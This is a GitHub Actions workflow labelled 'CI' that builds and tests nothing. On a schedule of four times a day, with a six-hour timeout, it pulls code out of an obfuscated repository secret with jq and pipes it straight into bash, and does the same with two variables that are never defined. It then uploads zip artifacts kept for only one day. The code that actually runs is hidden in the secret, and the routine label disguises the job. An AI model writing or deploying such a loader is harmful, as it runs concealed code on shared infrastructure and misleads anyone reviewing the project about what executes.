name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          raqz9: ${{ secrets.raqz9 }}
        run: |
          printf '%s' "$raqz9" | jq -r .kuu179 | /bin/bash
          echo $rg3695 | jq -r .jr8 | /bin/bash
          echo $bfyky5 | jq -r .y8704 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ZsxHVLR5
          path: "*.zip"
          retention-days: 1
